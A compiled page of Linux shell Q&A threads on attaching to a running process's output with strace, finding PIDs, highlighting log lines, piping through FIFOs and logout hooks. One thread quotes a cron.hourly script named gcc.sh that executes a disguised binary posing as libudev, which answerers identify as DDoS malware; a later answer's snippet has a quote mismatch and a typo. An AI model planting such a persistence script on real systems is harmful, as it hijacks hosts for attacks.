Read stdout from a process (linux embedded) - linux

Before flagging the question as duplicate, please read my various issues I encountered.
A bit of background: we are developing a C++ application running on embedded ARM sbc using a lite variant of debian linux. The application start at boot launched by the boot script and print various information to stdout. What we would like is the ability to connect using SSH/Telnet and read the application output, without having to kill the process and restart it for the current bash session. I want to create a simple .sh script for non-tech-savvy people to use.
The first solution for the similar question posted here is to use gdb. First it's not user-friendly (need to write multiple commands manually) and I wonder why but it don't seems to output anything into the file.
The second solution strace -ewrite -p PID works perfectly, that's what I want. Problem is, there's a lot more information than just the stdout, and it's badly formatted.
I managed to get an "acceptable" result with strace -e write=1 -s 1024 -p 20049 2>&1 | grep "write(1," but it still have the superfluous write(1, "...", 19) = 19 text. Up to this point it's simply a bit of string formatting, and I've found on multiple other pages this line saying it achieve good formatting : strace -ff -e write=1,2 -s 1024 -p PID 2>&1 | grep "^ |" | cut -c11-60 | sed -e 's/ //g' | xxd -r -p
There are some things I find strange in this command (why -ff?, why grep "^ |"?, why use xxd there?) and it just don't output anything when I try it.
Unfortunately, we do use a old buggy version of busybox (1.7.1) that have some problem with multiple pipes. That bug gives me bad results. For example, if I only do grep it works, and if I only do cut it also works, but let's say "grep "write(1," | cut -c11-60" returns nothing.
I know the real solution would simply be to update busybox and use these multiple pipes to format the string, but we can't update it since the os distribution is already installed on thousands of boards shipped to our clients worldwide..
Anyone have a miraculous solution? Thanks

Screen can be connected to an existing process using reptyr (http://blog.nelhage.com/2011/01/reptyr-attach-a-running-process-to-a-new-terminal/), or you can use neercs (http://caca.zoy.org/wiki/neercs) which I haven't used but apparently is like screen but supports attaching to an existing process all by itself.

Related

Get PID in bash file with open screen

I am a beginner in bash programming. I want to obtain PIDs from processes, in order to use trap and kill to receive and send signals to a program in the same file.
In particular, I start the program opening a screen in this way:
screen -d -m "start program"
process_id=`/bin/ps -fu $USER| grep "program" | grep -v "grep" | awk '{print $2}'`
The variable process_id contains two PIDs, not one. If I run without a screen, I don't have this issue (anyway, I have to open the screen).
Does anyone have solutions to this problem?
Another question: If I write
screen -d -m "start program">log
the log file isn't printed. Any suggestions?
For your first question, pgrep(or process grep) is what you are looking for.
For instance, the following will return a list of PIDs of all bash processes running.
preg bash
And if you read the docs:
-signal
Defines the signal to send to each matched process. Either the numeric or the symbolic signal name can be used.
Second question, you could either use the -LogFile flag if your version of screen supports it. Or specify the log file in your .screenrc configuration file.
This has already been answered.
Edit:
If you can't access the user's home directory where the configuration file .screenrc is usually put, you could change the $SCREENRC environment variable to explicitly set to an alternative path for it.

tail -f OR less +F how to highlight new lines

Is there any way to highlight, i.e. bold, or colorize new added lines since last change?
For example, I am watching a log file with multiple similar errors in PHP error_log (different line or function name, etc)... And I have to look at timestamps where one set of errors ends and another begins (page refresh)
It would be very helpful if there is a way to highlight, but only last added lines.
I am looking for solution to run on macOS and Linux in console.
Check out the watch command, if your system has it. The command:
watch -d tail /your/file/here
will display the file and highlight the differences character by character. Note that you do not want to use the -f option in this case.
Ubuntu has it. For OSX, you can can use brew install watch if you have homebrew installed or sudo ports install watch if you use ports.
Another bonus is that it works for any command that has output that changes over time. We have even used it with ls -l to watch the progress of backups and file compressions.
"tail" itself does not offer a serious way to do this. But give "multitail" a closer look:
https://www.vanheusden.com/multitail/
And for Mac OSX:
http://macappstore.org/multitail/
Turn on grep's line buffering mode.
Using tail
tail -f fileName | grep --line-buffered my_pattern
Using less
less +F fileName | grep --line-buffered my_pattern
Using watch & tail to highlight new lines
watch -d tail fileName
Note: For linux based systems.

Linux shell wrap a program's stdin and stdout using pipes

So, I have this interactive program that is running on an embedded linux ARM platform with no screen and that I cannot modify. To interact with it I have to ssh into the embedded linux distro, and run the program which is some sort of custom command line with builtin commands, and it does not exit, only SIGINT will quit the program.
I'm trying to automate it by letting it run in the background and communicate with it using pipes by sending SSH commands like this ssh user#host echo "command" > stdinpipe. This part works, I've been provided with an example like this in a shell script (I cannot use bash, I only have ash installed on the machine) :
#!/bin/sh
mkfifo somePipe
/proc/<PID>/exe < somePipe 2>&1 &
I can now easily command the program by writing to the pipe like
echo "command" > somePipe
and it outputs everything inside the terminal. The problem is that while it works if I have an SSH session open, it won't if I only send commands one by one as I said earlier (I'm using paramiko in python with the exec_command() method, just in case, but I don't think that is relevant, I could use invoke_session() but I don't want to have to deal with recv())
So I figured out I'd redirect the output of the program to a pipe. That's where problems arise. My first attempt was this one (please ignore the fact that everything is run as root and stored in the root home folder, that's how I got it and I don't have the time to make it cleaner now, plus I'm not the one managing the software) :
cd /root/binary
mkfifo outpipe
mkfifo inpipe
./command_bin &
# find PID automatically
command_pid=$(ps -a | egrep ' * \.\/command_bin *' | grep -v grep | awk '{print $1}')
/proc/${command_pid}/exe < inpipe 2>&1 &
echo "process ./command_bin running on PID ${command_pid}"
That alone works within the terminal itself. Now if I leave the SSH session open and open another terminal and type ssh root#host "echo command > /root/binary/inpipe" the code gets executed, but then it outputs the command I just typed and its result into the other terminal that stayed open. So it is obviously not an option, I have to capture the output somehow.
If I change ./command_bin & for ./command_bin >outpipe & the program never starts, I have no idea why, I know that because $command_pid is empty and I cannot find the process with ps -A
Now if instead I replace /proc/${command_pid}/exe < inpipe 2>&1 & with /proc/${command_pid}/exe < inpipe &>outpipe & the program starts, I can write to inpipe just fine with echo "command" > inpipe when the script finished running, however if I try any of cat < outpipe, tail outpipe it just hangs, and does nothing. I've tried using nohup when starting the command but it doesn't really help. I've also tried using a normal file for redirecting the output instead of a fifo, but with the exact same results.
I've spent the entire day on this thing and I cannot get it to work. Why is this not working ? Also I am probably just using an awful way to do this, is there any other way ? The only thing that's mandatory here is that I have to connect through ssh to the board and the command line utility has to stay open because it is communicating with onboard devices (using I2C, OneWire protocols etc).
To keep it simple I want to be able to write to the program's stdin whenever I want, get its stdout to go somewhere else (some file, buffer, I do not care) that I can easily retrieve later after an arbitrary amount of time with cat, tail or some other command with ssh.

Is this file (gcc.sh) in cron.hourly malware?

I have been experiencing spikes up to 1 Gbps on my server and have been looking for virus' and malware. I found this file: gcc.sh in /etc/cron.hourly and was wondering if anyone has seen anything like it, and would have some insight into the code. Thanks!
#!/bin/sh
PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:/usr/X11R6/binfor i in `cat /proc/net/dev|grep :|awk -F: {'print $1'}`; do ifconfig $i up& done
cp /lib/libudev.so /lib/libudev.so.6
/lib/libudev.so.6
Quite likely. It uses /lib/libudev.so.6 as an executable while the name implies it should be a library - try using a tool like nm or objdump to see if it's an executable. It copies from /lib/libudev.so to .so.6 - while normally the .so is a symlink to the versioned one. It also runs a for loop to bring up all network connections even if you've turned them off. It uses the name of a well-known compiler to look legit. I'd call this 99%+ likely a virus.
Found another reference to something calling itself gcc - https://superuser.com/questions/863997/ddos-virus-infection-as-a-unix-service-on-a-debian-8-vm-webserver . And yes, that's a DDoS virus on a unix system, exactly matching your problem.
yes it is.
try using ps -ef | grep -i libudev.so.6 to see the processes used by the program

How to run a script automatically when the user logs out in Linux?

I need to implement a feature that monitors which user logs in or out of the Linux desktop. When a user logs in or out, a script needs to be run automatically to notify a daemon process which user logged in or out.
I searched in Google and found a script under /etc/profile.d will be run automatically after the user logs in.
But I didn't find a common solution that will run a script automatically when the user logs out. It looks the solution is different for different linux distribution. Such as:
For Ubuntu, I need to modify the file /etc/lightdm/lightdm.conf
I need to support multiple Linux distributions, including: CentOS, Ubuntu, Redhat, and so on. If I use different solutions for different Linux distributions, my code will be very complicated.
I would like find a common solution for different Linux distributions. Can you please give some clues?
In bash, the ~/.bash_logout file will be executed when exiting shell.
So place in it script you want to execute
simply find out WHO's logged in and record when you first see them, and when you not longer see them. then read the "crontab" manual page and install a process that keeps track of this
the basic command: who | awk '{ print $1 }' | sort -u
set -- /tmp/whoseloggedin /tmp/whoWASloggedin
saving the data. ... | tee $1
comm -23 $1 $2 | sed "s/^/$(date) /" >> /tmp/justloggedIN
comm -13 $1 $2 | sed 's/^/$(date) /" >> /tnp/justloggedOFF
mv $1 $2
sleep for a second or two, and repeat.
you might store the data in a more reliable place than "/tmp/"

Resources